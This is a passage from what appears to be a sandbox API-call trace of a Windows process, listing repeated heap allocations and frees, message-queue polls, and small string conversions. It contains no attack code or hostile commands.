Flags=0x0, Size=0x18) returned 0x2466d90 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0251.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1798 [0251.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b18e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.775] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1738 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b18a8 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b18e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0251.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: 